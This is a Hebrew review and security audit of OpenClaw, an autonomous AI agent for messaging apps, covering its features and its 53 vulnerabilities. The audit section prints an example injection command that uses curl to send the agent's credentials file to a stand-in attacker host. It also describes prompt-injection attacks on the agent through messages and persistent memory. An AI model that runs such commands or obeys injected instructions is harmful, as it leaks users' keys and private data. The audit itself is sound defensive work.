שורה תחתונה: OpenClaw
דירוג: 3.5/5 | קוד פתוח | חינם (עלות API: 200 דולר בחודש ומעלה)
OpenClaw הוא פרויקט הקוד הפתוח השאפתני ביותר שראיתי השנה. הוא הופך כל פלטפורמת הודעות לסוכן AI אוטונומי עם זיכרון מתמשך ו-565 מיומנויות. הארכיטקטורה מרשימה: 520 אלף שורות של TypeScript קשיח, 12 דפוסי עיצוב, מערכת תוספים ברמה של פלטפורמות מסחריות.
הבעיה: ה-audit שעשיתי מצא 53 פגיעויות אבטחה, כולל command injection ברמת CVSS 9.8. חוקרי אבטחה מצאו 42,665 מכונות חשופות לאינטרנט הציבורי, מהן 93.4 אחוז עם עקיפת אימות. תשתמשו בזה לניסויים אישיים. אל תריצו את זה בפרודקשן בלי לבנות מסביבו חומות. נקודה.
ישבתי ארבעה ימים על 520 אלף שורות TypeScript. לא כי התחשק לי, אלא כי 120 אלף מפתחים כיכבו פרויקט בגיטהאב בלי שמישהו טרח לפרסם audit אבטחה רציני. OpenClaw, סוכן ה-AI שהפך לפרויקט הקוד הפתוח הכי מהיר בהיסטוריה של גיטהאב, פורקק 17 אלף פעם לפני שמישהו בדק אם הקוד שרץ על חשבונות ההודעות האישיים של אנשים באמת בטוח. אז עשיתי את ה-audit בעצמי. מצאתי 53 פגיעויות. חמש מהן קריטיות.
אמ;לק: מה שאתם חייבים לדעת
OpenClaw (שהיה פעם Clawdbot, שהיה פעם Moltbot) הוא סוכן AI אוטונומי שחי על פלטפורמות ההודעות שלכם. הוא חצה 100K כוכבים בפחות משבוע. זה הפרויקט הכי מהיר בהיסטוריה של גיטהאב.
- 53 פגיעויות ב-audit שעשיתי: 5 קריטיות, 17 גבוהות, 20 בינוניות, 11 נמוכות
- CVSS 9.8 command injection מאפשר הרצת קוד מרחוק דרך הודעת צ'אט רגילה
- 181 סודות דלופים שנמצאו בריפוזיטוריים ציבוריים על ידי GitGuardian, 65 מהם עדיין תקפים ביום שהדוח פורסם
- 42,665 מכונות חשופות באינטרנט הציבורי (Maor Dayan), 93.4 אחוז עם עקיפת אימות
- תוכנות גניבת מידע (Redline, Lumma, Vidar) כבר מכוונות ספציפית לתיקיות הקונפיג של OpenClaw (Hudson Rock)
שלושה שמות בשבוע אחד: דרמת המיתוג
פיטר שטיינברגר בנה את PSPDFKit לאחד מספריות ה-PDF הכי מצליחות בעולם. אחר כך הוא פרש. אחר כך הגיע AI, והוא יצא מהפנסיה.
היצירה שלו התחילה בשם "Claudebot", משחק מילים ישיר על Claude של Anthropic. הפרויקט התפוצץ בגיטהאב תחת השם הזה. באמצע ינואר 2026 הוא כבר צבר עשרות אלפי כוכבים.
סרטון ויראלי של היוטיובר Alex Finn שקרא לכלי "ה-AI הכי חזק שאני הכרתי" גרם להתקפת קנייה של Mac Mini שגמרה מלאים בכל העולם. ואז Anthropic שלחו מכתב נימוסי של cease-and-desist. לא איום משפטי, בקשה פשוטה: השם קרוב מדי ל-Claude.
מה שקרה אחרי זה הפך לאגדת אינטרנט. שטיינברגר העלה פוסט בדיסקורד של הפרויקט בחמש לפנות בוקר וביקש מהקהילה לסיעור מוחות לשם חדש. תוך שעות הם נחתו על "Moltbot", על שם הדרך שבה סרטנים משילים את הקליפה כדי לגדול. מטאפורה חכמה של זהות שמתחלפת כדי להיות משהו יותר גדול.
המיתוג החדש נכנס לתוקף ב-27 בינואר. תוך עשר שניות מרגע ששם המשתמש הישן בגיטהאב התפנה, נוכלי קריפטו רשמו אותו לעצמם. הם פתחו טוקן Clawdbot מזויף שהגיע לשווי שוק של 16 מיליון דולר לפני שמישהו שם לב.
אזהרה: חברת Malwarebytes תיעדה קמפיינים של התחזות אחרי שינוי השם: אתרים מזויפים, לינקי הורדה מזויפים, ודפי פישינג שמכוונים למשתמשים שלא עדכנו את הבוקמארקים. תוודאו שאתם מורידים מ-openclaw.ai או מהריפו הרשמי בגיטהאב. נקודה.
השם "Moltbot" החזיק יומיים. ב-29 בינואר שטיינברגר הודיע על השינוי הסופי ל-OpenClaw, והפעם אחרי שעשו בדיקת trademark אמיתית. הפרויקט עבר ל-openclaw/openclaw בגיטהאב ולאתר openclaw.ai.
שלושה שמות בשבעה ימים. הקהילה התייחסה לזה כמו טקס חניכה: אם שרדת את כל שלושת שינויי השם, אתה תורם אמיתי.
תכל'ס, הכאוס במיתוג חשף משהו חשוב על מהירות הפרויקט. הוא זז כל כך מהר שצעדים תפעוליים בסיסיים כמו בדיקת trademark קרו בדיעבד. הדפוס הזה, לשלוח קודם ולאבטח אחר כך, התברר כרלוונטי הרבה מעבר לסיפור השם.
מה OpenClaw עושה בפועל
OpenClaw הוא לא צ'אטבוט. ההבחנה הזאת קריטית. צ'אטבוט מחכה שתכתבו לו משהו ואז עונה. OpenClaw יכול לשלוח לכם הודעה ראשון.
הוא רץ כתהליך קבוע על המכונה שלכם, מחובר לפלטפורמות ההודעות, ויכול ליזום שיחות, להריץ משימות מתוזמנות, ולבצע פעולות אוטונומיות על בסיס טריגרים שאתם מגדירים.
הרעיון המרכזי: סוכן AI אחד, כל פלטפורמת הודעות, זיכרון מתמשך לאורך כולן. אתם יכולים להתחיל שיחה ב-WhatsApp, להמשיך אותה בטלגרם, ולהתייחס לשתיהן מדיסקורד. הסוכן זוכר הכל, בין הפלטפורמות ולאורך הזמן.
תמיכת פלטפורמות
OpenClaw מתחבר לשבע פלטפורמות הודעות בצורה מקומית: WhatsApp (דרך Baileys), Telegram (Grammy), Discord (Carbon), Slack, Signal, iMessage ו-LINE. מעבר לזה, 29 הרחבות קהילה מוסיפות את Matrix, Microsoft Teams, Mattermost, Google Chat ועוד. הסה"כ מגיע ל-36 פלטפורמות.
אקוסיסטם המיומנויות
בהשקה OpenClaw הגיע עם 52 מיומנויות. ב-31 בינואר 2026 המרקטפלייס ClawdHub כבר החזיק 565 מיומנויות שהקהילה תרמה. הטווח נע מהמעשי (תמלול שיחות, ניהול Gmail, אוטומציית בית) לנישתי במופגן (אינוונטר מרתף יין, ניהול שרת Minecraft, לוחות האכלה לחיות מחמד).
מיומנויות יכולות להשתרשר אחת לשנייה. משתמש אחד ב-DevOps הגדיר ש-OpenClaw ינטר בריאות שרתים, יפתח issues בגיטהאב לחריגות, וידאג לתקן תבניות שגיאה מוכרות כל הלילה בלי התערבות אדם.
אגנוסטי למודל
OpenClaw תומך ב-Claude, GPT-4, Gemini, ומודלים מקומיים דרך Ollama. אפשר להחליף את המודל שמאחורי הקלעים בלי לשנות את המיומנויות או את ה-workflows. המערכת משתמשת ב-Pi Agent Core כשכבת תזמור שמפרידה בין ספק המודל למנוע הרצת המיומנויות.
סוכן ששופר את עצמו
OpenClaw יכול לכתוב מיומנויות חדשות לעצמו. אם תבקשו ממנו משהו שאין לו מיומנות עבורו, מיומנות ה-coding-agent מייצרת, בודקת ומתקינה מיומנות חדשה תוך כדי השיחה.
משתמשי דיסקורד תיעדו מקרים שבהם הסוכן יצר אינטגרציות מותאמות למכשירי בית חכם אזוטריים, APIים לניהול פיננסי אישי, ופלטפורמות SaaS נישתיות. בלי התערבות תכנות של אדם. המיומנות נשמרת ב-workspace וממשיכה להתקיים בין סשנים.
ההבדל "הפרואקטיבי"
הפיצ'ר שמבדיל את OpenClaw מכל עוזר AI אחר: heartbeats ו-cron jobs. אפשר להגדיר לסוכן לבדוק דברים מדי פעם ולפנות אליכם ביוזמתו.
תדרוך בוקר בשבע. התרעה על מניה שזזה מעל חמישה אחוז. תזכורת לקחת הפסקה אחרי שלוש שעות של ריכוז. הסוכן לא מחכה לקלט. הוא פועל לפי לוח זמנים, לפי טריגרים, ולפי דפוסים שהוא מזהה בנתונים שלכם.
הדוגמה הכי ויראלית: הסוכן של Alex Finn בשם "Henry" נרשם לבד ל-Twilio, קנה מספר טלפון, חיבר את ה-voice API, והתקשר אליו לפלאפון. בלי שמישהו אמר לו לעשות את הצעדים האינדיבידואליים האלה. הפוסט על זה צבר קרוב לתשעה מיליון צפיות.
יוזקייסים אמיתיים
מהנדס DevOps אחד הגדיר את OpenClaw לנטר אשכול Kubernetes כל הלילה: אבחון פודים שנופלים, פתיחת issues בגיטהאב עם ניתוח שורש, וניסיונות תיקון אוטומטיים. משתמש אחר שולט בכל תיבת ה-Gmail שלו מטלגרם: ארכוב, תשובות, ותזמון מיילים בלי לפתוח דפדפן.
עלות אמיתית
OpenClaw חינם וקוד פתוח, אבל להריץ אותו זה לא חינם. קריאות ה-API למודל מצטברות מהר.
Alex Finn, משתמש העל הכי בולט של הפרויקט, מוציא 200 דולר בחודש על Claude Max (Opus 4.5 בתפקיד ה"מוח"), 250 דולר בחודש על ChatGPT Pro (Codex CLI בתפקיד ה"שריר"), ו-250 דולר בחודש על Gemini Ultra לחיפוש. Fast Company כינה את הכלי "יקר באופן מוגזם לשימוש".
מי שרוצה לחסוך יכול להחליף ל-MiniMax (עשרה דולר בחודש) או להריץ מודלים מקומיים ב-Ollama על Mac Studio (החל מ-8,500 דולר), אבל האיכות צונחת משמעותית. הסטאפ המינימלי: Mac Mini של 600 דולר ועוד 200 דולר בחודש על API.
ארכיטקטורה: 520 אלף שורות של TypeScript
OpenClaw הוא מונורפו מנוהל עם pnpm workspaces. הבסיס קוד פרוש על פני 3,154 קבצים בסה"כ של כ-520 אלף שורות קוד. כל זה TypeScript קשיח, בלי שום any מרומז. לא מפתיע, זו הקפדה שמגיעה ממישהו שבנה SDKים.
מסלול הודעה בסיסי
כל הודעה עוברת את אותו המסלול:
- מתאם פלטפורמה (Platform Adapter) מקבל הודעה (WhatsApp, Telegram וכן הלאה)
- Gateway מנתב אותה דרך שרת WebSocket RPC שרץ על
ws://127.0.0.1:18789 - Pi Agent Core מעבד את ההודעה, בוחר כלים, ומייצר תשובה
- Tool Execution מריץ את המיומנויות הדרושות (פקודות bash, קריאות API, פעולות קובץ)
- Response Delivery שולח את התשובה חזרה דרך אותו מתאם פלטפורמה
ה-Gateway הוא מערכת העצבים המרכזית. הוא מנהל חיבורים מכל הפלטפורמות, מטפל ב-state של סשנים, ומנתב הודעות למופע הסוכן הנכון. הארכיטקטורה תומכת במספר שיחות סימולטניות על פני פלטפורמות שונות בלי זיהום צולב.
מערכת הסוכן
המוח של OpenClaw הוא @mariozechner/pi-agent-core בגרסה 0.49.3. החבילה הזו, שעוד לא הגיעה ל-1.0, מטפלת בכל תזמור ה-AI: בניית פרומפט, בחירת כלים, ניהול זיכרון, ויצירת תשובה.
כל פיצ'ר ב-OpenClaw תלוי בחבילה הבודדת הזאת. זו בו-זמנית עדות ליכולות של החבילה וגורם סיכון משמעותי. על זה נחזור בחלק האבטחה.
דפוסי עיצוב
הבסיס קוד מממש 12 דפוסי עיצוב מזוהים: Dependency Injection, Plugin Architecture, Observer, Command, Strategy, Factory, Builder, Singleton, Mediator, Chain of Responsibility, Template Method ו-Decorator.
מה שבלט לי: המימושים של Plugin ו-DI פשוט טובים. מיומנויות נרשמות דרך ממשק דקלרטיבי, וה-DI container מנהל מחזור חיים ותלויות בצורה נקייה. מערכת ה-Hook (דפוס Observer) מאפשרת למיומנויות להגיב לאירועים על פני כל הפלטפורמה בלי צימוד הדוק. זה לא קוד של חובבים, זה קוד של מישהו שכבר שחק בליגה.
מורכבות ה-CLI
OpenClaw מגיע עם 176 פקודות CLI, כולן פרושות במבנה תיקיות שטוח. זה גם מרשים וגם בלתי ניתן לניהול. פקודות מטפלות בהכל, מ-gateway run (הפעלת הדיימון) ועד skill install (הוספת מיומנויות) ו-config set (שינוי הגדרות).
המבנה השטוח אומר שכל 176 קבצי הפקודות יושבים באותה תיקייה בלי ארגון לתתי-תיקיות. ניווט למפתחים חדשים הופך סיוט.
ביצועים
חביון אמיתי בעולם האמיתי נע בין שתיים ל-15 שניות לתשובה. צוואר הבקבוק הוא כמעט תמיד קריאת ה-API למודל עצמו, לא התשתית של OpenClaw. מודלים מקומיים דרך Ollama יכולים לקצר משמעותית, אבל במחיר איכות תשובה.
ה-audit שלי: 53 פגיעויות
הרצתי audit אבטחה מלא על הבסיס קוד. המתודולוגיה כללה מידול איומים בשיטת STRIDE, ניתוח injection על פני 78 נקודות קלט, סקירת אימות על כל חמשת מנגנוני ה-auth, ובדיקת בידוד ה-sandbox. כל ממצא עבר וידוא דרך ניתוח סטטי של הקוד המקור. זה לא audit של "הסתכלתי על README". זה audit של "קראתי את הקוד עצמו". יש הבדל.
המספרים
| חומרה | כמות |
|---|---|
| קריטי | 5 |
| גבוה | 17 |
| בינוני | 20 |
| נמוך | 11 |
| סה"כ | 53 |
מצב אבטחה כולל: סביר (עם חששות משמעותיים)
CRIT-01: Command Injection (CVSS 9.8)
זה הממצא הכי מסוכן. כלי ה-bash של OpenClaw מקבל פקודות shell מסוכן ה-AI ומריץ אותן על המכונה שלכם. קיימת מערכת allowlist שמגבילה אילו בינאריים מותרים להרצה. הבעיה: ה-allowlist בודק רק את הטוקן הראשון (שם הבינארי). הוא לא מאמת את הארגומנטים.
תוקף שיכול להשפיע על התנהגות ה-AI דרך הודעה מעוצבת בקפידה יכול לבנות פקודה שבה הביצועי עובר את ה-allowlist, אבל הארגומנטים מכילים תווי מטא של shell.
פקודה בסגנון grep '$(curl attacker.com/steal?data=$(cat ~/.clawdbot/auth-profiles.json))' /dev/null עוברת את בדיקת ה-allowlist ל-grep תוך כדי שהיא מוציאה החוצה כל קרדנשיאל שיש לכם במערכת.
זרם ההתקפה: שולחים הודעה מעוצבת ב-WhatsApp או טלגרם. ה-AI מעבד אותה, בונה פקודת bash עם תוכן שמושפע מהתוקף. ה-allowlist בודק רק את שם הביצועי. ה-shell מריץ את הכל, כולל את ה-payload המוזרק. זה לא תאוריה. זה באמת עובד ככה.
CRIT-02: מיומנויות בלי ארגז חול
מיומנויות רצות בתהליך ה-Node.js הראשי. אין sandbox, אין בידוד תהליכים, אין הגבלות יכולות. כשאתם מתקינים מיומנות מ-ClawdHub, הקוד הזה רץ עם גישה מלאה למערכת הקבצים, לרשת, ולכל מפתח API ששמור בקונפיגורציה שלכם.
ה-jiti dynamic loader מייבא קבצי TypeScript ישירות לתוך התהליך הראשי. מיומנות זדונית זוכה לאותן הרשאות שיש ל-OpenClaw עצמו: היא יכולה לקרוא את הקרדנשיאלים שלכם, להוציא החוצה את ההודעות שלכם, להתקין backdoor מתמשך, או למחוק לכם קבצים.
CRIT-03: סיכון ל-ban ב-WhatsApp
OpenClaw משתמש בספריית Baileys לאינטגרציה עם WhatsApp. Baileys היא מימוש שהונדס לאחור של פרוטוקול WhatsApp Web, לא ה-WhatsApp Business API הרשמי.
WhatsApp מזהה ומשעה חשבונות שמשתמשים בלקוחות לא רשמיים באופן אקטיבי. חסימות הן קבועות. אין תהליך ערעור. למי שכל התקשורת העסקית שלו עוברת ב-WhatsApp, זה סיכון להמשכיות עסקית. אמיתי.
CRIT-04: תנאי מרוץ TOCTOU
וולידציית נתיבים של ה-sandbox סובלת מפגיעות קלאסית של time-of-check-time-of-use. המערכת בודקת אם נתיב מכיל symlinks, ואז מבצעת את פעולת הקובץ. בין שני השלבים האלה, תוקף יכול להחליף את הקובץ המאומת בסימלינק שמצביע החוצה מה-sandbox. הטבע האסינכרוני של הבדיקה מרחיב את חלון המרוץ.
CRIT-05: תלות מרכזית מתחת ל-1.0
הכל ב-OpenClaw עובר דרך @mariozechner/pi-agent-core בגרסה 0.49.3. זו חבילה שלא הגיעה ל-1.0, כלומר ה-API שלה לא נחשב יציב.
פגיעות אבטחה בחבילה הבודדת הזו הייתה משפיעה על כל התקנה של OpenClaw בעולם. החבילה מוצמדת לגרסה ספציפית, מה שמונע עדכונים מקריים אבל גם אומר שטלאי אבטחה דורשים התערבות ידנית. אחת משתי הרעות.
ממצאי HIGH בולטים
בין 17 הממצאים ברמת HIGH:
- אחסון קרדנשיאלים בטקסט פשוט: כל מפתח API, טוקן OAuth וקרדנשיאל סשן יושבים בקבצי JSON לא מוצפנים
- חשיפת ארגומנטי CLI: העברת קרדנשיאלים כארגומנטים בפקודה הופכת אותם לגלויים דרך
ps auxעל מערכות רב-משתמש - חוסר הרשאה ב-RPC: לשרת ה-WebSocket של ה-Gateway חסרות בדיקות הרשאה עקביות. מאומת זה לא אומר מורשה
- בלי סינון תעבורה יוצאת: סוכנים יכולים לפתוח חיבורי רשת יוצאים לכל כיוון, בלי הגבלות
- דריסת מיומנויות ב-workspace: מיומנויות קהילה יכולות להחליף מיומנויות מובנות, מה שמאפשר supply-chain attacks
- סשן WhatsApp לא מוצפן: קרדנשיאלי סשן שמאוחסנים בטקסט פשוט מאפשרים חטיפת חשבון
בעיית הקרדנשיאלים
OpenClaw שומר כל קרדנשיאל בטקסט פשוט של JSON. מפתח ה-Anthropic שלכם, מפתח ה-OpenAI, טוקן הבוט של טלגרם, סשן WhatsApp: הכל יושב ב-~/.clawdbot/auth-profiles.json כטקסט קריא.
מודל האבטחה מסתמך על הרשאות מערכת קבצים בלבד. על מכונה משותפת, כל משתמש עם גישת קריאה לתיקיית הבית שלכם מחזיק בכל חשבונות שירותי ה-AI שלכם.
הניתוח של GitGuardian אימת את הנזק בקנה מידה גדול. הם סרקו ריפוזיטוריים ציבוריים בגיטהאב ומצאו 181 סודות ייחודיים שדלפו מקונפיגורציות OpenClaw. מתוכם, 65 היו עדיין תקפים בזמן הדוח. שלושים אחוז היו טוקני בוט של טלגרם.
דליפות מהעולם האמיתי: GitGuardian מצאו טוקן Notion של חברת בריאות, וקרדנשיאלי Kubernetes cluster של סטארטאפ פינטק, שניהם הועלו לריפוזיטוריים ציבוריים על ידי משתמשים שלא הבינו שקבצי הקונפיג של OpenClaw מכילים חומר רגיש.
גרסת v2026.1.29 הסירה את אופציית auth: none שבעבר אפשרה הפעלת Gateway בלי שום אימות. זה היה שינוי שובר תאימות, אבל הכרחי. מאוחר, אבל הכרחי.
הפרויקט תומך בחמישה מנגנוני אימות: זהות מכשיר Ed25519, אימות מבוסס טוקן, אימות סיסמה, אינטגרציית Tailscale, ואימות מקומי של הפלטפורמה. האיכות משתנה. Ed25519 מיושם היטב. מצב סיסמה דווקא מנטרל את וידוא Tailscale, יוצר הורדת אבטחה בפועל.
שרשרת אספקה והרעלת מיומנויות
צוות האבטחה של סיסקו פרסם דוח שקרא ל-OpenClaw "סיוט אבטחה" לארגונים. הם ניתחו 31 אלף מיומנויות מה-ClawdHub ומצאו ש-26 אחוז מכילות לפחות פגיעות אבטחה אחת.
מיומנות אחת בלטה במיוחד: "What Would Elon Do" עם תשעה ממצאים, כולל הוצאת נתונים פעילה. היא שלחה את נתוני השיחות של המשתמש לאנדפוינט חיצוני בכל הפעלה. היו לה אלפי התקנות לפני שסיסקו סימנה אותה.
חוקר אבטחה הדגים את סיכון שרשרת האספקה כשהעלה ל-ClawdHub מיומנות מורעלת בכוונה. תוך שבוע היא הורדה מעל 4,000 פעם על ידי משתמשים מ-7 מדינות. ה-payload היה שפיר (הוא רק רשם התקנות), אבל זה הוכיח שתהליך הביקורת של ClawdHub לא מספיק כדי לתפוס קוד זדוני. זה לא audit, זה קריאת README.
הזרקת פרומפט דרך זיכרון
הזיכרון המתמשך של OpenClaw מכניס משטח התקפה חדש. כי הסוכן זוכר שיחות על פני פלטפורמות וזמן, payload של הזרקת פרומפט שנמסר בשיחה אחת יכול להשפיע על התנהגות בשיחות עתידיות. החוקרים קוראים לזה התקפה "שדורסת זמן": תשתול את ה-payload ביום שלישי, תפעיל אותו ביום שישי כשהמשתמש מבקש מהסוכן לעשות משהו רגיש.
חמישה מיילים בחמש דקות
חוקר האבטחה Matvey Kukuy הדגים התקפת הזרקת פרומפט מעשית נגד OpenClaw שחילצה חמישה מיילים פרטיים תוך פחות מחמש דקות. ההתקפה לא דרשה גישה מיוחדת: הודעה מעוצבת שנשלחה דרך ערוץ הודעות רגיל הספיקה כדי לגרום לסוכן לדלוף נתונים רגישים מהזיכרון שלו ומהשירותים המחוברים.
זה אישר שההתקפות ה"דורסות-זמן" לא תאורטיות. הן מעשיות.
42,665 מכונות חשופות
חוקר האבטחה Maor Dayan ביצע סריקה שיטתית של האינטרנט ומצא 42,665 מכונות OpenClaw חשופות לאינטרנט הציבורי. מתוכן, 5,194 אומתו באופן פעיל כפגיעות. הממצא: 93.4 אחוז עם עקיפת אימות קריטית, כלומר כל אחד יכול לגשת לפאנל הניהול ולשלוט בסוכן מרחוק.
Jamieson O'Reilly מ-Dvuln מצא מפתחות API של Anthropic, טוקני בוט של טלגרם, קרדנשיאלי OAuth של Slack, והיסטוריות שיחה שלמות נגישות במכונות חשופות. משתמשים שהגדירו Tailscale Funnel בלי אימות מתאים הריצו פאנלי ניהול פתוחים.
חברת אבטחה אחת (Hackian AI) הדגימה השגת הרצת קוד מרחוק על מכונה מוגדרת לא נכון בפחות משעתיים.
מכונות זומבי: 90 אחוז מהמכונות החשופות עדיין רצו תחת השמות הישנים Clawdbot או Moltbot, כלומר הן לא עודכנו במשך ימים או שבועות. המשמעות: קוד לא מטולא שרץ על האינטרנט הפתוח עם גישה מלאה לחשבונות ההודעות ומפתחות ה-API של הבעלים. זה לא אבסטרקטי. אלה אנשים אמיתיים.
תוכנות גניבה שמכוונות אליכם
Hudson Rock דיווחו שמשפחות תוכנה זדונית לגניבת מידע (Redline, Lumma ו-Vidar) עדכנו את הטרגוט שלהן כדי לחפש ספציפית תיקיות קונפיג של OpenClaw. הנוזקה סורקת אחרי ~/.clawdbot/ ו-~/.openclaw/ על מכונות נגועות, ומחלצת מפתחות API, טוקני סשן, ולוגים של שיחות.
זה כבר לא איום היפותטי. הקרדנשיאלים של OpenClaw עכשיו יעד ספציפי לנוזקת מדף.
מה כן עובד: איכות הקוד
תמונת האבטחה מדאיגה, אבל איכות הקוד מספרת סיפור אחר. הערכתי את הבסיס קוד ב-B+ (טוב) כללי.
קונפיגורציית ה-TypeScript הקשיחה תופסת קטגוריות שלמות של באגים בזמן קומפילציה. מתוך 412 אלף שורות של קוד אפליקציה, רק חמישה קבצי אינטגרציית טלגרם משתמשים ב-@ts-nocheck כדי לעקוף בדיקת טיפוסים. זה יחס יוצא דופן לפרויקט בגודל כזה. באמת.
12 דפוסי העיצוב הם לא קישוט אקדמי. ה-Dependency Injection container נקי וממוקד. ארכיטקטורת התוספים למיומנויות משתמשת במערכת רישום שהופכת את הרחבת הפלטפורמה לפשוטה.
חבילת הבדיקות כוללת 885 בדיקות יחידה עם רף כיסוי של 70 אחוז שנאכף דרך CI. בידוד בדיקות למופת: כל בדיקה יוצרת לעצמה תיקיית HOME כדי למנוע הפרעות הדדיות. היחס בין קבצי בדיקה לקבצי מקור עומד על 55 אחוז, כלומר יותר מחצי מקבצי המקור יש להם קבצי בדיקה תואמים.
התיעוד החיצוני מקיף. ה-README, אתר התיעוד, ומדריכי פיתוח המיומנויות כתובים היטב ומתעדכנים. התיעוד הפנימי בקוד דליל (JSDoc מינימלי), אבל טיפוסי ה-TypeScript משמשים כתיעוד משתמע לרוב הממשקים הציבוריים.
הפרדוקס
וכאן הסתירה. ל-OpenClaw יש מודול אבטחה ייעודי. הוא מכיל לוגיקת אימות, ניהול קרדנשיאלים, ועוזרי הרשאה. רק שלושה מודולים אחרים מייבאים אותו. תשתית האבטחה קיימת, אבל שאר הבסיס קוד כמעט לא משתמש בה.
קוד ה-sandbox, הקוד שאחראי בפועל על הכלת פעולות שעלולות להיות זדוניות, לא כלול בכיסוי בדיקות היחידה. 50 המקרים של .catch(() => {}) בבסיס קוד בולעים בשקט שגיאות שיכולות להעיד על הפרות אבטחה. המשמעת של הבדיקות שמגינה על קוד הפיצ'רים לא מגיעה לקוד האבטחה. זה המקום הכי מטריד בבסיס קוד.
תמונה רחבה: Shadow AI והאמצע של 2026
OpenClaw הוא לא רק ריפו בגיטהאב. זה סימן לאיפה AI אישי הולך, ואימוץ בארגונים כבר קורה בצללים.
VentureBeat דיווחו ש-22 אחוז מלקוחות ארגוניים מחזיקים עובדים שמריצים OpenClaw על מכשירי חברה בלי אישור IT. Shadow AI זה ה-shadow IT החדש. DigitalOcean השיקו תבנית one-click deploy, הורידו עוד את החסם.
מניית Cloudflare קפצה ב-14 אחוז בסוף ינואר 2026, חלק מזה מיוחס לתעבורה מוגברת ממכונות OpenClaw שעוברות דרך Cloudflare Workers. מלאי Mac Mini נגמר אצל קמעונאים בכל העולם כשמשתמשים רצו להגדיר חומרה שרצה תמיד לסוכנים שלהם.
סיכון ה-OAuth
יש מתח של תנאי שימוש. שימוש ב-Claude דרך OAuth עם OpenClaw טכנית מפר את תנאי Anthropic. עלו דיווחים ש-Anthropic ניתקו טוקני OAuth של חלק מהמשתמשים.
אם גישת OAuth תוגבל, משתמשים יצטרכו להשתמש ב-API הישיר, שהוא הרבה יותר יקר. ההסתמכות של הפרויקט על Claude בתור ספק המודל הפופולרי ביותר הופכת את זה לסיכון קיומי.
Moltbook: כשסוכני AI יוצאים לחברה
ואז יש את Moltbook: רשת חברתית ל-AI שהושקה לצד שינוי השם ל-Moltbot. היא מאפשרת לסוכני OpenClaw לתקשר בינם, לשתף מידע, ולשתף פעולה על פני בעלים שונים.
תוך שבוע, 157 אלף סוכני AI נרשמו לפלטפורמה. סוכנים מפרסמים עדכוני סטטוס, עונים לשאלות מסוכנים אחרים, ויוצרים קשרים על בסיס תחומי העניין של הבעלים שלהם. Fortune דיווחו על Moltbook כסיוט פוטנציאלי של פרטיות נתונים.
אנדרי קארפאתי קרא לתופעת OpenClaw "הדבר המדע-בדיוני ביותר שקרוב-להמראה שראיתי". כשקארפאתי אומר את זה, אפשר להיצמד לכיסא.
Palo Alto Networks פרסמו דוח שמזהיר ש-OpenClaw עלול לאותת על משבר אבטחת AI רחב יותר. IBM ציינו שסוכן בעל יכולות גבוהות בלי בקרות בטיחות ראויות יוצר פגיעויות משמעותיות.
Vectra AI פרסמו ניתוח מפורט של איך מכונות OpenClaw עלולות להישלח לנשק לתשתית C2, להתמדה, ולתנועה לטרלית בתוך רשתות ארגוניות.
המתח אמיתי. OpenClaw מייצג פריצת דרך אמיתית ב-AI אישי: סוכן שחי על פלטפורמות ההודעות שלכם, פועל בשמכם, ומשתפר עם הזמן.
הוא גם מריץ 53 פגיעויות ידועות על כל מכונה שהוא מותקן עליה, עם 42,665 מכונות חשופות לאינטרנט ונוזקת גניבת מידע שמחפשת באופן אקטיבי את קבצי הקונפיג שלו. אי אפשר להחזיק את שני הקטבים בלי הכרעה.
AI Deck: מי כן ומי לא
חוזקות
- סוכן AI אוטונומי אמיתי (הודעה פרואקטיבית, cron jobs, heartbeats)
- אינטגרציית 36 פלטפורמות הודעות (שבע ליבה ועוד 29 הרחבות)
- 565 מיומנויות ב-ClawdHub שמכסות זרימות עבודה אמיתיות
- אגנוסטי למודל: Claude, GPT-4, Gemini, Ollama (מקומי)
- זיכרון מתמשך חוצה פלטפורמות
- ארכיטקטורת קוד מצוינת (12 דפוסי עיצוב, TypeScript קשיח)
- קהילה פעילה: 8,900 חברי דיסקורד, 130 תורמים
- חינם וקוד פתוח (עלויות API חלות)
חולשות
- 53 פגיעויות כולל CVSS 9.8 command injection
- כל הקרדנשיאלים שמורים בטקסט פשוט של JSON
- מיומנויות רצות בלי sandbox בתהליך Node.js הראשי
- אינטגרציית WhatsApp משתמשת ב-API לא רשמי (סיכון ban)
- תלות מרכזית מתחת ל-1.0 (pi-agent-core v0.49.3)
- בלי סינון תעבורה יוצאת: סוכנים יכולים להוציא נתונים בחופשיות
- 26 אחוז ממיומנויות המרקטפלייס עם פגיעויות (דוח סיסקו)
- שלושה שינויי שם בשבוע אחד רומזים על חוסר בשלות תפעולית
- 42,665 מכונות חשופות לאינטרנט הציבורי (93.4 אחוז עם עקיפת אימות)
- נוזקות (Redline, Lumma, Vidar) מכוונות לתיקיות הקונפיג
- שימוש ב-Claude דרך OAuth עלול להפר את תנאי Anthropic
- יקר להרצה: מינימום 200 דולר בחודש ב-API למרות ה"חינם"
צ'קליסט לניסוי בטוח
- תריצו בתוך Docker container עם חשבון משתמש ייעודי
- אל תשתמשו במספר ה-WhatsApp הראשי שלכם
- תפתחו מפתחות API חד-פעמיים עם מגבלות הוצאה
- תגדירו
exec.securityלמצב "allowlist" (לא "full") - תקשרו את ה-Gateway ל-loopback בלבד
- תסקרו את קוד המקור של כל מיומנות לפני התקנה
- לעולם אל תחשפו את פורט ה-Gateway לאינטרנט
אפילו Alex Finn, הדובר הכי חזק של הפרויקט, מזהיר מלתת לו גישה למייל או סמס בגלל סיכון הזרקת פרומפט. הצעדים האלה מגבילים את רדיוס הנזק, אבל הם לא מתקנים את הפגיעויות הבסיסיות. אל תתבלבלו.
האם OpenClaw בטוח לשימוש?
בטוח לניסוי אישי על מערכות מבודדות ולא קריטיות. לא בטוח לשימוש פרודקשן, להטמעה ארגונית, או לכל תרחיש שבו גניבת קרדנשיאלים או הוצאת נתונים תגרום לנזק אמיתי.
53 הפגיעויות שמצאתי הן מבניות, לא מקריות. תיקון שלהן דורש שינויים ארכיטקטוניים במנגנון הרצת הפקודות, במודל בידוד המיומנויות, ובמערכת אחסון הקרדנשיאלים. זה לא פאץ' של יומיים.
מה עם אלטרנטיבות?
האלטרנטיבות הכי קרובות הן קנייניות. Microsoft Copilot משתלב עם Teams אבל חסר לו הטווח הרב-פלטפורמתי. העוזרים של Gemini של גוגל עובדים בתוך האקוסיסטם של גוגל.
באופציות קוד פתוח, סוכני LangChain ו-AutoGPT מציעים יכולות אוטונומיות דומות אבל בלי האינטגרציות המובנות של הודעות. הערך הייחודי של OpenClaw הוא השילוב: הודעות רב-פלטפורמה, זיכרון מתמשך, פעולות פרואקטיביות, ומרקטפלייס מיומנויות ענק. אין היום מתחרה שמכסה את כל הארבע. זו האמת.
שורה תחתונה סופית
דירוג סופי: 3.5/5
